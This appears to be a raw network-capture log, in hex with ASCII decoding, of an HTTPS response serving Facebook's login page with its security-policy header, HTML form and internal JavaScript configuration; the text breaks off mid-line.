                                                                                                                                                                                    2023-01-05 07:59:25 UTC16118INData Raw: 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 64 61 74 61 3a 20 62 6c 6f 62 3a 20 27 73 65 6c 66 27 20 68 74 74 70 73 3a 2f 2f 2a 2e 66 62 73 62 78 2e 63 6f 6d 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 27 75 6e 73 61 66 65 2d 65 76 61 6c 27 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 3b 73 63 72 69 70 74 2d 73 72 63 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 27 75 6e 73 61 66 65 2d 65 76 61 6c 27 20 62 6c 6f 62 3a 20 64 61 74 61 3a 20 27 73 65 6c 66 27 3b 73 74 79 6c 65 2d 73 72 63 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 64 61 74 61 3a 20 2a 2e 66 61 63 65 62
                                                                                                                                                                                    Data Ascii: content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.faceb
                                                                                                                                                                                    2023-01-05 07:59:25 UTC16120INData Raw: 64 30 31 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 69 64 3d 22 66 61 63 65 62 6f 6f 6b 22 20 63 6c 61 73 73 3d 22 6e 6f 5f 6a 73 22 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6f 72 69 67 69 6e 2d 77 68 65 6e 2d 63 72 6f 73 73 6f 72 69 67 69 6e 22 20 69 64 3d 22 6d 65 74 61 5f 72 65 66 65 72 72 65 72 22 20 2f 3e 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 49 57 6f 47 64 4c 6f 42 22 3e 66 75 6e 63 74 69 6f 6e 20 65 6e 76 46 6c 75 73 68 28 61 29 7b 66 75 6e 63 74 69 6f 6e 20 62 28 62 29 7b 66 6f 72 28 76 61 72 20 63 20 69 6e 20 61 29 62 5b 63 5d 3d 61
                                                                                                                                                                                    Data Ascii: d01a<!DOCTYPE html><html lang="en" id="facebook" class="no_js"><head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="IWoGdLoB">function envFlush(a){function b(b){for(var c in a)b[c]=a
                                                                                                                                                                                    2023-01-05 07:59:25 UTC16121INData Raw: 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 63 65 62 6f 6f 6b 22 20 2f 3e 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 6c 6f 67 69 6e 2e 70 68 70 3f 6e 65 78 74 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 25 32 46 61 64 73 25 32 46 6d 61 6e 61 67 65 72 25 32 46 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 25 32 46 61 63 63 6f 75 6e 74 5f 62 69 6c 6c 69 6e 67 22 20 2f 3e 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 5f 55 53 22 20 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 63 61 6e 6f 6e 69 63 61 6c 22 20 68
                                                                                                                                                                                    Data Ascii: name" content="Facebook" /><meta property="og:url" content="https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" /><meta property="og:locale" content="en_US" /><link rel="canonical" h
                                                                                                                                                                                    2023-01-05 07:59:25 UTC16123INData Raw: 79 4e 49 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 64 61 74 61 2d 62 6f 6f 74 6c 6f 61 64 65 72 2d 68 61 73 68 3d 22 59 6f 32 55 7a 4f 68 22 20 2f 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 57 2f 72 2f 4e 6b 4a 57 66 32 44 48 41 79 67 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 64 61 74 61 2d 62 6f 6f 74 6c 6f 61 64 65 72 2d 68 61 73 68 3d 22 58 4e 61 4d 6e 32 2b 22 20 6e 6f 6e 63 65 3d 22 49 57 6f 47 64 4c 6f 42 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 49 57 6f 47 64 4c 6f 42 22 3e 72 65 71 75 69 72 65 4c 61 7a 79 28 5b 22 48 61 73 74 65
                                                                                                                                                                                    Data Ascii: yNI.css?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="Yo2UzOh" /><script src="https://static.xx.fbcdn.net/rsrc.php/v3/yW/r/NkJWf2DHAyg.js?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="XNaMn2+" nonce="IWoGdLoB"></script><script nonce="IWoGdLoB">requireLazy(["Haste
                                                                                                                                                                                    2023-01-05 07:59:25 UTC16124INData Raw: 6c 69 63 65 2c 53 65 72 76 65 72 4a 53 29 7b 28 6e 65 77 20 53 65 72 76 65 72 4a 53 28 29 29 2e 68 61 6e 64 6c 65 28 7b 22 64 65 66 69 6e 65 22 3a 5b 5b 22 55 52 4c 46 72 61 67 6d 65 6e 74 50 72 65 6c 75 64 65 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 22 68 61 73 68 74 61 67 52 65 64 69 72 65 63 74 22 3a 74 72 75 65 2c 22 66 72 61 67 42 6c 61 63 6b 6c 69 73 74 22 3a 5b 22 6e 6f 6e 63 65 22 2c 22 61 63 63 65 73 73 5f 74 6f 6b 65 6e 22 2c 22 6f 61 75 74 68 5f 74 6f 6b 65 6e 22 2c 22 78 73 22 2c 22 63 68 65 63 6b 70 6f 69 6e 74 5f 64 61 74 61 22 2c 22 63 6f 64 65 22 5d 7d 2c 31 33 37 5d 2c 5b 22 43 6f 6d 65 74 50 65 72 73 69 73 74 51 75 65 72 79 50 61 72 61 6d 73 22 2c 5b 5d 2c 7b 22 72 65 6c 61 74 69 76 65 22 3a 7b 7d 2c 22 64 6f 6d 61 69 6e 22 3a 7b 7d 7d 2c 36
                                                                                                                                                                                    Data Ascii: lice,ServerJS){(new ServerJS()).handle({"define":[["URLFragmentPreludeConfig",[],{"hashtagRedirect":true,"fragBlacklist":["nonce","access_token","oauth_token","xs","checkpoint_data","code"]},137],["CometPersistQueryParams",[],{"relative":{},"domain":{}},6
                                                                                                                                                                                    2023-01-05 07:59:25 UTC16126INData Raw: 5b 22 43 75 72 72 65 6e 74 55 73 65 72 49 6e 69 74 69 61 6c 44 61 74 61 22 2c 5b 5d 2c 7b 22 41 43 43 4f 55 4e 54 5f 49 44 22 3a 22 30 22 2c 22 55 53 45 52 5f 49 44 22 3a 22 30 22 2c 22 4e 41 4d 45 22 3a 22 22 2c 22 53 48 4f 52 54 5f 4e 41 4d 45 22 3a 6e 75 6c 6c 2c 22 49 53 5f 42 55 53 49 4e 45 53 53 5f 50 45 52 53 4f 4e 5f 41 43 43 4f 55 4e 54 22 3a 66 61 6c 73 65 2c 22 48 41 53 5f 53 45 43 4f 4e 44 41 52 59 5f 42 55 53 49 4e 45 53 53 5f 50 45 52 53 4f 4e 22 3a 66 61 6c 73 65 2c 22 49 53 5f 46 41 43 45 42 4f 4f 4b 5f 57 4f 52 4b 5f 41 43 43 4f 55 4e 54 22 3a 66 61 6c 73 65 2c 22 49 53 5f 4d 45 53 53 45 4e 47 45 52 5f 4f 4e 4c 59 5f 55 53 45 52 22 3a 66 61 6c 73 65 2c 22 49 53 5f 44 45 41 43 54 49 56 41 54 45 44 5f 41 4c 4c 4f 57 45 44 5f 4f 4e 5f 4d 45
                                                                                                                                                                                    Data Ascii: ["CurrentUserInitialData",[],{"ACCOUNT_ID":"0","USER_ID":"0","NAME":"","SHORT_NAME":null,"IS_BUSINESS_PERSON_ACCOUNT":false,"HAS_SECONDARY_BUSINESS_PERSON":false,"IS_FACEBOOK_WORK_ACCOUNT":false,"IS_MESSENGER_ONLY_USER":false,"IS_DEACTIVATED_ALLOWED_ON_ME
                                                                                                                                                                                    2023-01-05 07:59:25 UTC16127INData Raw: 69 6f 6e 22 3a 22 35 33 37 2e 33 36 22 2c 22 70 6c 61 74 66 6f 72 6d 41 72 63 68 69 74 65 63 74 75 72 65 22 3a 22 36 34 22 2c 22 70 6c 61 74 66 6f 72 6d 4e 61 6d 65 22 3a 22 57 69 6e 64 6f 77 73 22 2c 22 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 22 3a 22 31 30 22 2c 22 70 6c 61 74 66 6f 72 6d 46 75 6c 6c 56 65 72 73 69 6f 6e 22 3a 22 31 30 22 7d 2c 35 32 37 5d 2c 5b 22 50 72 6f 6d 69 73 65 55 73 65 50 6f 6c 79 66 69 6c 6c 53 65 74 49 6d 6d 65 64 69 61 74 65 47 4b 22 2c 5b 5d 2c 7b 22 77 77 77 5f 61 6c 77 61 79 73 5f 75 73 65 5f 70 6f 6c 79 66 69 6c 6c 5f 73 65 74 69 6d 6d 65 64 69 61 74 65 22 3a 66 61 6c 73 65 7d 2c 32 31 39 30 5d 2c 5b 22 4b 53 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 22 6b 69 6c 6c 65 64 22 3a 7b 22 5f 5f 73 65 74 22 3a 5b 22 4d 4c 48 55
                                                                                                                                                                                    Data Ascii: ion":"537.36","platformArchitecture":"64","platformName":"Windows","platformVersion":"10","platformFullVersion":"10"},527],["PromiseUsePolyfillSetImmediateGK",[],{"www_always_use_polyfill_setimmediate":false},2190],["KSConfig",[],{"killed":{"__set":["MLHU
                                                                                                                                                                                    2023-01-05 07:59:25 UTC16129INData Raw: 49 54 49 4e 47 5f 43 41 4e 44 49 44 41 54 45 5f 50 4f 52 54 41 4c 5f 41 43 43 4f 55 4e 54 5f 44 45 4c 45 54 49 4f 4e 5f 43 41 52 44 22 2c 22 42 49 5a 5f 49 4e 42 4f 58 5f 50 4f 50 5f 55 50 5f 54 49 50 5f 4e 41 56 49 47 41 54 49 4f 4e 5f 42 55 47 5f 46 49 58 22 2c 22 53 52 54 5f 52 45 56 49 45 57 5f 44 49 53 41 42 4c 45 5f 46 45 4c 4c 4f 57 53 48 49 50 5f 52 45 56 49 45 57 22 2c 22 45 4f 5f 53 54 4f 52 45 5f 48 4f 4d 45 5f 50 41 47 45 5f 43 4f 56 49 44 31 39 5f 42 41 4e 4e 45 52 22 5d 7d 2c 22 6b 6f 22 3a 7b 22 5f 5f 73 65 74 22 3a 5b 22 33 4f 73 4c 76 6e 53 48 4e 54 74 22 2c 22 31 47 37 77 4a 36 62 4a 74 39 4b 22 2c 22 39 4e 70 6b 47 59 77 7a 72 50 47 22 2c 22 33 6f 68 35 4d 77 38 36 55 53 6a 22 2c 22 38 4e 41 63 65 45 79 39 4a 5a 6f 22 2c 22 37 46 4f 49
                                                                                                                                                                                    Data Ascii: ITING_CANDIDATE_PORTAL_ACCOUNT_DELETION_CARD","BIZ_INBOX_POP_UP_TIP_NAVIGATION_BUG_FIX","SRT_REVIEW_DISABLE_FELLOWSHIP_REVIEW","EO_STORE_HOME_PAGE_COVID19_BANNER"]},"ko":{"__set":["3OsLvnSHNTt","1G7wJ6bJt9K","9NpkGYwzrPG","3oh5Mw86USj","8NAceEy9JZo","7FOI
                                                                                                                                                                                    2023-01-05 07:59:25 UTC16130INData Raw: 62 75 79 2e 63 6f 6d 2e 6d 78 22 2c 22 62 6f 6f 6b 69 6e 67 2e 63 6f 6d 22 2c 22 6e 69 62 69 6f 2e 6e 6f 22 5d 7d 2c 33 38 37 31 5d 2c 5b 22 49 6e 69 74 69 61 6c 43 6f 6f 6b 69 65 43 6f 6e 73 65 6e 74 22 2c 5b 5d 2c 7b 22 64 65 66 65 72 43 6f 6f 6b 69 65 73 22 3a 66 61 6c 73 65 2c 22 69 6e 69 74 69 61 6c 43 6f 6e 73 65 6e 74 22 3a 7b 22 5f 5f 73 65 74 22 3a 5b 5d 7d 2c 22 6e 6f 43 6f 6f 6b 69 65 73 22 3a 66 61 6c 73 65 2c 22 73 68 6f 75 6c 64 53 68 6f 77 43 6f 6f 6b 69 65 42 61 6e 6e 65 72 22 3a 66 61 6c 73 65 7d 2c 34 33 32 38 5d 2c 5b 22 57 65 62 43 6f 6e 6e 65 63 74 69 6f 6e 43 6c 61 73 73 53 65 72 76 65 72 47 75 65 73 73 22 2c 5b 5d 2c 7b 22 63 6f 6e 6e 65 63 74 69 6f 6e 43 6c 61 73 73 22 3a 22 45 58 43 45 4c 4c 45 4e 54 22 7d 2c 34 37 30 35 5d 2c 5b
                                                                                                                                                                                    Data Ascii: buy.com.mx","booking.com","nibio.no"]},3871],["InitialCookieConsent",[],{"deferCookies":false,"initialConsent":{"__set":[]},"noCookies":false,"shouldShowCookieBanner":false},4328],["WebConnectionClassServerGuess",[],{"connectionClass":"EXCELLENT"},4705],[
                                                                                                                                                                                    2023-01-05 07:59:25 UTC16131INData Raw: 75 73 61 6e 64 73 53 65 70 61 72 61 74 6f 72 22 3a 34 2c 22 73 74 61 6e 64 61 72 64 44 65 63 69 6d 61 6c 50 61 74 74 65 72 6e 49 6e 66 6f 22 3a 7b 22 70 72 69 6d 61 72 79 47 72 6f 75 70 53 69 7a 65 22 3a 33 2c 22 73 65 63 6f 6e 64 61 72 79 47 72 6f 75 70 53 69 7a 65 22 3a 33 7d 2c 22 6e 75 6d 62 65 72 69 6e 67 53 79 73 74 65 6d 44 61 74 61 22 3a 6e 75 6c 6c 7d 2c 35 34 5d 2c 5b 22 53 65 73 73 69 6f 6e 4e 61 6d 65 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 22 73 65 65 64 22 3a 22 32 76 57 69 22 7d 2c 37 35 37 5d 2c 5b 22 5a 65 72 6f 43 61 74 65 67 6f 72 79 48 65 61 64 65 72 22 2c 5b 5d 2c 7b 7d 2c 31 31 32 37 5d 2c 5b 22 5a 65 72 6f 52 65 77 72 69 74 65 52 75 6c 65 73 22 2c 5b 5d 2c 7b 22 72 65 77 72 69 74 65 5f 72 75 6c 65 73 22 3a 7b 7d 2c 22 77 68 69 74 65 6c
                                                                                                                                                                                    Data Ascii: usandsSeparator":4,"standardDecimalPatternInfo":{"primaryGroupSize":3,"secondaryGroupSize":3},"numberingSystemData":null},54],["SessionNameConfig",[],{"seed":"2vWi"},757],["ZeroCategoryHeader",[],{},1127],["ZeroRewriteRules",[],{"rewrite_rules":{},"whitel
                                                                                                                                                                                    2023-01-05 07:59:25 UTC16133INData Raw: 6c 61 73 73 69 66 69 65 72 5c 2f 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5c 2f 64 6f 67 66 6f 6f 64 69 6e 67 22 3a 31 2c 22 5c 2f 78 74 69 2e 70 68 70 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5c 2f 66 62 6c 69 74 65 5c 2f 63 6f 6e 66 69 67 5c 2f 22 3a 31 2c 22 5c 2f 68 72 5c 2f 7a 73 68 5c 2f 77 63 5c 2f 22 3a 31 2c 22 5c 2f 61 6a 61 78 5c 2f 62 6f 6f 74 6c 6f 61 64 65 72 2d 65 6e 64 70 6f 69 6e 74 5c 2f 22 3a 31 2c 22 5c 2f 6d 6f 62 69 6c 65 5c 2f 7a 65 72 6f 5c 2f 63 61 72 72 69 65 72 5f 70 61 67 65 5c 2f 22 3a 31 2c 22 5c 2f 6d 6f 62 69 6c 65 5c 2f 7a 65 72 6f 5c 2f 63 61 72 72 69 65 72 5f 70 61 67 65 5c 2f 65 64 75 63 61 74 69 6f 6e 5f 70 61 67 65 5c 2f 22 3a 31 2c 22 5c 2f 6d 6f 62 69 6c 65 5c 2f 7a 65 72 6f 5c 2f 63 61 72 72 69 65 72 5f 70 61 67 65 5c 2f 66 65 61
                                                                                                                                                                                    Data Ascii: lassifier\/":1,"\/zero\/dogfooding":1,"\/xti.php":1,"\/zero\/fblite\/config\/":1,"\/hr\/zsh\/wc\/":1,"\/ajax\/bootloader-endpoint\/":1,"\/mobile\/zero\/carrier_page\/":1,"\/mobile\/zero\/carrier_page\/education_page\/":1,"\/mobile\/zero\/carrier_page\/fea
                                                                                                                                                                                    2023-01-05 07:59:25 UTC16134INData Raw: 2f 72 65 6c 69 61 62 69 6c 69 74 79 22 3a 31 2c 22 5c 2f 72 2e 70 68 70 22 3a 31 2c 22 5c 2f 6d 72 5c 2f 22 3a 31 2c 22 5c 2f 72 65 67 5c 2f 22 3a 31 2c 22 5c 2f 72 65 67 69 73 74 72 61 74 69 6f 6e 5c 2f 6c 6f 67 5c 2f 22 3a 31 2c 22 5c 2f 74 65 72 6d 73 5c 2f 22 3a 31 2c 22 5c 2f 66 31 32 33 5c 2f 22 3a 31 2c 22 5c 2f 65 78 70 65 72 74 5c 2f 22 3a 31 2c 22 5c 2f 65 78 70 65 72 74 73 5c 2f 22 3a 31 2c 22 5c 2f 74 65 72 6d 73 5c 2f 69 6e 64 65 78 2e 70 68 70 22 3a 31 2c 22 5c 2f 74 65 72 6d 73 2e 70 68 70 22 3a 31 2c 22 5c 2f 73 72 72 5c 2f 22 3a 31 2c 22 5c 2f 6d 73 69 74 65 5c 2f 72 65 64 69 72 65 63 74 5c 2f 22 3a 31 2c 22 5c 2f 66 62 73 5c 2f 70 69 78 65 6c 5c 2f 22 3a 31 2c 22 5c 2f 63 6f 6e 74 61 63 74 70 6f 69 6e 74 5c 2f 70 72 65 63 6f 6e 66 69 72
                                                                                                                                                                                    Data Ascii: /reliability":1,"\/r.php":1,"\/mr\/":1,"\/reg\/":1,"\/registration\/log\/":1,"\/terms\/":1,"\/f123\/":1,"\/expert\/":1,"\/experts\/":1,"\/terms\/index.php":1,"\/terms.php":1,"\/srr\/":1,"\/msite\/redirect\/":1,"\/fbs\/pixel\/":1,"\/contactpoint\/preconfir
                                                                                                                                                                                    2023-01-05 07:59:25 UTC16136INData Raw: 5f 62 72 5f 71 75 65 75 65 5f 69 6d 6d 65 64 69 61 74 65 22 3a 33 2c 22 75 73 65 5f 63 72 69 74 69 63 61 6c 5f 66 6f 72 5f 66 61 6c 6c 62 61 63 6b 5f 66 72 6f 6d 5f 69 6d 6d 65 64 69 61 74 65 22 3a 66 61 6c 73 65 2c 22 69 6d 70 72 65 73 73 69 6f 6e 5f 65 78 70 65 72 69 6d 65 6e 74 5f 66 6c 61 67 22 3a 33 7d 2c 35 32 33 37 5d 2c 5b 22 63 72 3a 36 39 36 37 30 33 22 2c 5b 5d 2c 7b 22 5f 5f 72 63 22 3a 5b 6e 75 6c 6c 2c 22 41 61 33 6f 4e 6e 32 64 46 70 49 78 4c 45 30 4f 67 4a 38 7a 72 77 48 33 48 70 76 53 36 35 6d 50 69 6f 58 34 50 4f 70 54 74 65 72 58 4c 6a 47 71 57 79 50 43 38 2d 63 46 48 4e 6a 45 6d 30 31 66 33 4d 42 49 58 4d 46 64 55 42 45 4e 67 53 55 71 4c 78 77 56 72 44 62 78 78 62 67 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 37 30 38 38 38 36 22 2c 5b 22
                                                                                                                                                                                    Data Ascii: _br_queue_immediate":3,"use_critical_for_fallback_from_immediate":false,"impression_experiment_flag":3},5237],["cr:696703",[],{"__rc":[null,"Aa3oNn2dFpIxLE0OgJ8zrwH3HpvS65mPioX4POpTterXLjGqWyPC8-cFHNjEm01f3MBIXMFdUBENgSUqLxwVrDbxxbg"]},-1],["cr:708886",["
                                                                                                                                                                                    2023-01-05 07:59:25 UTC16137INData Raw: 22 41 61 33 6f 4e 6e 32 64 46 70 49 78 4c 45 30 4f 67 4a 38 7a 72 77 48 33 48 70 76 53 36 35 6d 50 69 6f 58 34 50 4f 70 54 74 65 72 58 4c 6a 47 71 57 79 50 43 38 2d 63 46 48 4e 6a 45 6d 30 31 66 33 4d 42 49 58 4d 46 64 55 42 45 4e 67 53 55 71 4c 78 77 56 72 44 62 78 78 62 67 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 39 32 35 31 30 30 22 2c 5b 22 52 75 6e 42 6c 75 65 22 5d 2c 7b 22 5f 5f 72 63 22 3a 5b 22 52 75 6e 42 6c 75 65 22 2c 22 41 61 33 6f 4e 6e 32 64 46 70 49 78 4c 45 30 4f 67 4a 38 7a 72 77 48 33 48 70 76 53 36 35 6d 50 69 6f 58 34 50 4f 70 54 74 65 72 58 4c 6a 47 71 57 79 50 43 38 2d 63 46 48 4e 6a 45 6d 30 31 66 33 4d 42 49 58 4d 46 64 55 42 45 4e 67 53 55 71 4c 78 77 56 72 44 62 78 78 62 67 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 37 32 39 34 31 34
                                                                                                                                                                                    Data Ascii: "Aa3oNn2dFpIxLE0OgJ8zrwH3HpvS65mPioX4POpTterXLjGqWyPC8-cFHNjEm01f3MBIXMFdUBENgSUqLxwVrDbxxbg"]},-1],["cr:925100",["RunBlue"],{"__rc":["RunBlue","Aa3oNn2dFpIxLE0OgJ8zrwH3HpvS65mPioX4POpTterXLjGqWyPC8-cFHNjEm01f3MBIXMFdUBENgSUqLxwVrDbxxbg"]},-1],["cr:729414
                                                                                                                                                                                    2023-01-05 07:59:25 UTC16139INData Raw: 5d 2c 7b 22 5f 5f 72 63 22 3a 5b 6e 75 6c 6c 2c 22 41 61 32 44 46 42 6f 53 4f 4f 56 6c 31 4d 2d 45 4a 35 6e 4f 48 69 38 45 59 69 61 54 6e 7a 45 53 4e 30 4d 68 47 63 6a 51 68 48 74 71 44 62 4f 5f 73 45 33 78 6c 44 30 49 4c 34 48 37 69 43 5f 46 5a 32 53 59 74 6c 66 50 47 64 56 48 50 4c 33 74 79 59 7a 56 36 6a 76 79 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 31 39 38 34 30 38 31 22 2c 5b 5d 2c 7b 22 5f 5f 72 63 22 3a 5b 6e 75 6c 6c 2c 22 41 61 30 77 30 44 38 67 59 4b 6b 72 4b 78 39 52 35 4c 38 46 63 5f 35 67 64 35 45 30 4f 65 72 64 62 2d 30 37 2d 55 65 44 79 58 59 31 64 50 6d 63 38 4e 65 4b 48 74 5f 75 2d 42 30 65 38 56 73 5f 76 79 53 4f 75 4e 6e 6c 78 4f 69 4a 7a 59 62 52 57 52 64 71 73 77 74 36 31 48 6d 6e 22 5d 7d 2c 2d 31 5d 5d 2c 22 72 65 71 75 69 72 65 22
                                                                                                                                                                                    Data Ascii: ],{"__rc":[null,"Aa2DFBoSOOVl1M-EJ5nOHi8EYiaTnzESN0MhGcjQhHtqDbO_sE3xlD0IL4H7iC_FZ2SYtlfPGdVHPL3tyYzV6jvy"]},-1],["cr:1984081",[],{"__rc":[null,"Aa0w0D8gYKkrKx9R5L8Fc_5gd5E0Oerdb-07-UeDyXY1dPmc8NeKHt_u-B0e8Vs_vySOuNnlxOiJzYbRWRdqswt61Hmn"]},-1]],"require"
                                                                                                                                                                                    2023-01-05 07:59:25 UTC16140INData Raw: 74 69 63 65 3c 2f 75 3e 3c 2f 69 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 5f 35 38 35 72 20 5f 35 30 66 34 22 3e 59 6f 75 20 6d 75 73 74 20 6c 6f 67 20 69 6e 20 74 6f 20 63 6f 6e 74 69 6e 75 65 2e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 5f 34 2d 75 32 20 5f 31 77 31 74 20 5f 34 2d 75 38 20 5f 35 32 6a 76 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 5f 78 6b 75 22 20 69 64 3d 22 68 65 61 64 65 72 5f 62 6c 6f 63 6b 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 5f 39 37 77 31 20 5f 35 30 66 36 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 5f 39 61 78 7a 22 3e 4c 6f 67 20 49 6e 74 6f 20 46 61 63 65 62 6f 6f 6b 3c 2f 64 69 76 3e 3c 2f 73 70 61 6e 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 6f 67 69 6e 5f
                                                                                                                                                                                    Data Ascii: tice</u></i><div class="_585r _50f4">You must log in to continue.</div></div></div><div class="_4-u2 _1w1t _4-u8 _52jv"><div class="_xku" id="header_block"><span class="_97w1 _50f6"><div class="_9axz">Log Into Facebook</div></span></div><div class="login_
                                                                                                                                                                                    2023-01-05 07:59:25 UTC16142INData Raw: 22 20 2f 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 6c 67 6e 6a 73 22 20 6e 61 6d 65 3d 22 6c 67 6e 6a 73 22 20 76 61 6c 75 65 3d 22 6e 22 20 2f 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6c 65 61 72 66 69 78 20 5f 35 34 36 36 20 5f 34 34 6d 67 22 20 69 64 3d 22 65 6d 61 69 6c 5f 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 63 6c 61 73 73 3d 22 69 6e 70 75 74 74 65 78 74 20 5f 35 35 72 31 20 69 6e 70 75 74 74 65 78 74 20 5f 31 6b 62 74 20 69 6e 70 75 74 74 65 78 74 20 5f 31 6b 62 74 22 20 6e 61 6d 65 3d 22 65 6d 61 69 6c 22 20 69 64 3d 22 65 6d 61 69 6c 22 20 74 61 62 69 6e 64 65 78 3d 22 30 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 45 6d 61 69 6c 20 6f 72 20 70 68 6f 6e 65
                                                                                                                                                                                    Data Ascii: " /><input type="hidden" id="lgnjs" name="lgnjs" value="n" /><div class="clearfix _5466 _44mg" id="email_container"><input type="text" class="inputtext _55r1 inputtext _1kbt inputtext _1kbt" name="email" id="email" tabindex="0" placeholder="Email or phone
                                                                                                                                                                                    2023-01-05 07:59:25 UTC16143INData Raw: 3d 22 6f 66 66 22 20 69 64 3d 22 70 72 65 66 69 6c 6c 5f 73 6f 75 72 63 65 22 20 6e 61 6d 65 3d 22 70 72 65 66 69 6c 6c 5f 73 6f 75 72 63 65 22 20 2f 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 6f 66 66 22 20 69 64 3d 22 70 72 65 66 69 6c 6c 5f 74 79 70 65 22 20 6e 61 6d 65 3d 22 70 72 65 66 69 6c 6c 5f 74 79 70 65 22 20 2f 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 6f 66 66 22 20 69 64 3d 22 66 69 72 73 74 5f 70 72 65 66 69 6c 6c 5f 73 6f 75 72 63 65 22 20 6e 61 6d 65 3d 22 66 69 72 73 74 5f 70 72 65 66 69 6c 6c 5f 73 6f 75 72 63 65 22 20 2f 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 61 75 74 6f 63 6f 6d
                                                                                                                                                                                    Data Ascii: ="off" id="prefill_source" name="prefill_source" /><input type="hidden" autocomplete="off" id="prefill_type" name="prefill_type" /><input type="hidden" autocomplete="off" id="first_prefill_source" name="first_prefill_source" /><input type="hidden" autocom
                                                                                                                                                                                    2023-01-05 07:59:25 UTC16145INData Raw: 61 74 61 2d 72 65 66 65 72 72 65 72 3d 22 70 61 67 65 5f 66 6f 6f 74 65 72 22 20 64 61 74 61 2d 74 65 73 74 69 64 3d 22 70 61 67 65 5f 66 6f 6f 74 65 72 22 3e 3c 75 6c 20 63 6c 61 73 73 3d 22 75 69 4c 69 73 74 20 6c 6f 63 61 6c 65 53 65 6c 65 63 74 6f 72 4c 69 73 74 20 5f 32 70 69 64 20 5f 35 30 39 2d 20 5f 34 6b 69 20 5f 36 2d 68 20 5f 36 2d 6a 20 5f 36 2d 69 22 20 64 61 74 61 2d 6e 6f 63 6f 6f 6b 69 65 73 3d 22 31 22 3e 3c 6c 69 3e 45 6e 67 6c 69 73 68 20 28 55 53 29 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 5f 73 76 34 22 20 64 69 72 3d 22 6c 74 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 